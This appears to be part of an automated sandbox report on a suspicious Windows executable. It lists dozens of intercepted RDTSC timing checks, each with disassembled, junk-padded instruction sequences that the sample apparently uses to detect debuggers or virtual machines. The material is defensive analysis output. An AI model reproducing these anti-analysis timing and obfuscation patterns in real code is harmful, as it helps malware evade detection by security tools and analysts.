                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE093A second address: 4AE0940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE08A0 second address: 4AE08D3 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx edi, ax 0x0000000d mov edx, ecx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov ax, A42Fh 0x00000016 pushad 0x00000017 call 00007F9D1073AE72h 0x0000001c pop eax 0x0000001d popad 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE08D3 second address: 4AE08DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE08DA second address: 4AE08F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D1073AE77h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE05E1 second address: 4AE0636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, di 0x00000011 pushfd 0x00000012 jmp 00007F9D106F7667h 0x00000017 xor ah, 0000005Eh 0x0000001a jmp 00007F9D106F7669h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0636 second address: 4AE063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE063C second address: 4AE0640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0640 second address: 4AE0644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0644 second address: 4AE0662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D106F7661h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0662 second address: 4AE0668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF057A second address: 4AF057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF057E second address: 4AF0582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF0582 second address: 4AF0588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF0588 second address: 4AF05B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 06h 0x00000005 mov edx, 4A2CF9B8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F9D1073AE79h 0x00000016 mov ch, 1Ch 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00681 second address: 4B00686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00686 second address: 4B006C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushfd 0x00000007 jmp 00007F9D1073AE76h 0x0000000c jmp 00007F9D1073AE75h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop eax 0x0000001c movsx edi, ax 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B006C7 second address: 4B006D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F765Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B006D7 second address: 4B006DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B006DB second address: 4B00717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F9D106F7667h 0x00000010 and dword ptr [eax], 00000000h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9D106F7665h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00717 second address: 4B00758 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d jmp 00007F9D1073AE6Eh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9D1073AE77h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00758 second address: 4B0075E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0075E second address: 4B00762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00762 second address: 4B00766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE07C3 second address: 4AE07CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 86C9h 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE07CC second address: 4AE0806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F9D106F765Eh 0x00000015 or ecx, 4CEDC248h 0x0000001b jmp 00007F9D106F765Bh 0x00000020 popfd 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0806 second address: 4AE0830 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007F9D1073AE6Bh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9D1073AE70h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0830 second address: 4AE083F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE083F second address: 4AE0845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0845 second address: 4AE0849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0849 second address: 4AE084D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00242 second address: 4B00248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00248 second address: 4B0024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2086D second address: 4B20871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20871 second address: 4B208D5 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F9D1073AE76h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F9D1073AE70h 0x00000015 xchg eax, ecx 0x00000016 jmp 00007F9D1073AE70h 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007F9D1073AE71h 0x00000022 movzx ecx, dx 0x00000025 popad 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c mov si, 82C1h 0x00000030 popad 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20A1C second address: 4B20A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20A22 second address: 4B20A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9D1073AE75h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20A42 second address: 4B20AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00F12014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007F9D143480B6h 0x00000026 push FFFFFFFEh 0x00000028 jmp 00007F9D106F7662h 0x0000002d pop eax 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F9D106F765Eh 0x00000035 jmp 00007F9D106F7665h 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007F9D106F7660h 0x00000041 add ecx, 254D2428h 0x00000047 jmp 00007F9D106F765Bh 0x0000004c popfd 0x0000004d popad 0x0000004e ret 0x0000004f nop 0x00000050 push eax 0x00000051 call 00007F9D1434810Fh 0x00000056 mov edi, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F9D106F7660h 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20AC6 second address: 4B20ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20ACA second address: 4B20AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20AD0 second address: 4B20AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9D1073AE70h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movsx ebx, si 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20AFA second address: 4B20B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F765Fh 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F9D106F7666h 0x00000010 mov ebp, esp 0x00000012 jmp 00007F9D106F7660h 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9D106F765Ah 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20B46 second address: 4B20B4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20B4C second address: 4B20B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F765Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0015 second address: 4AD001B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD001B second address: 4AD001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD001F second address: 4AD003F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD003F second address: 4AD005A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7667h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD005A second address: 4AD012C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 5Dh 0x00000005 mov cx, 9257h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F9D1073AE6Dh 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F9D1073AE6Ch 0x0000001a adc ch, FFFFFFF8h 0x0000001d jmp 00007F9D1073AE6Bh 0x00000022 popfd 0x00000023 mov ecx, 724AC72Fh 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F9D1073AE72h 0x00000030 and esp, FFFFFFF8h 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F9D1073AE6Eh 0x0000003a adc ecx, 11F57788h 0x00000040 jmp 00007F9D1073AE6Bh 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007F9D1073AE78h 0x0000004c or cl, FFFFFFE8h 0x0000004f jmp 00007F9D1073AE6Bh 0x00000054 popfd 0x00000055 popad 0x00000056 xchg eax, ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushfd 0x0000005b jmp 00007F9D1073AE6Bh 0x00000060 sbb cx, 492Eh 0x00000065 jmp 00007F9D1073AE79h 0x0000006a popfd 0x0000006b push esi 0x0000006c pop ebx 0x0000006d popad 0x0000006e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD012C second address: 4AD019B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 jmp 00007F9D106F765Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9D106F765Fh 0x00000015 jmp 00007F9D106F7663h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F9D106F7668h 0x00000021 or ax, C368h 0x00000026 jmp 00007F9D106F765Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD019B second address: 4AD019F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD019F second address: 4AD01A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD01A5 second address: 4AD01ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F9D1073AE70h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dh, B4h 0x00000013 jmp 00007F9D1073AE6Ah 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9D1073AE77h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD01ED second address: 4AD0243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 6E7Ah 0x00000007 mov dx, F846h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebx, dword ptr [ebp+10h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F9D106F7666h 0x0000001a or si, 2CE8h 0x0000001f jmp 00007F9D106F765Bh 0x00000024 popfd 0x00000025 call 00007F9D106F7668h 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0243 second address: 4AD02A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D1073AE6Eh 0x00000009 adc cl, 00000078h 0x0000000c jmp 00007F9D1073AE6Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F9D1073AE78h 0x00000018 sub ecx, 113724D8h 0x0000001e jmp 00007F9D1073AE6Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F9D1073AE70h 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD02A7 second address: 4AD02AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD02AB second address: 4AD02B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD02B1 second address: 4AD02E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9D106F765Bh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9D106F7665h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD02E7 second address: 4AD02ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD02ED second address: 4AD02F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD02F1 second address: 4AD0323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007F9D1073AE6Fh 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9D1073AE75h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0323 second address: 4AD0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D106F7667h 0x00000009 jmp 00007F9D106F7663h 0x0000000e popfd 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9D106F7662h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0375 second address: 4AD03D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c pushad 0x0000000d jmp 00007F9D1073AE75h 0x00000012 push eax 0x00000013 mov ebx, 380D0BF2h 0x00000018 pop ebx 0x00000019 popad 0x0000001a je 00007F9D82B990DCh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9D1073AE6Bh 0x00000029 or si, 29EEh 0x0000002e jmp 00007F9D1073AE79h 0x00000033 popfd 0x00000034 mov ah, D9h 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD03D6 second address: 4AD03DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD03DC second address: 4AD0424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F9D1073AE6Dh 0x0000001b adc cl, FFFFFF86h 0x0000001e jmp 00007F9D1073AE71h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0424 second address: 4AD0429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0429 second address: 4AD0454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE78h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F9D82B99049h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0454 second address: 4AD0458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0458 second address: 4AD045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD045E second address: 4AD046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F765Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD046D second address: 4AD04AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b jmp 00007F9D1073AE75h 0x00000010 or edx, dword ptr [ebp+0Ch] 0x00000013 jmp 00007F9D1073AE6Eh 0x00000018 test edx, 61000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD04AA second address: 4AD04AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD04AE second address: 4AD04B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD04B2 second address: 4AD04B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC069E second address: 4AC06B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D1073AE74h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC06B6 second address: 4AC0714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F9D106F7666h 0x00000011 push eax 0x00000012 jmp 00007F9D106F765Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F9D106F765Bh 0x00000021 jmp 00007F9D106F7663h 0x00000026 popfd 0x00000027 mov eax, 3E67576Fh 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0714 second address: 4AC071A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC071A second address: 4AC071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
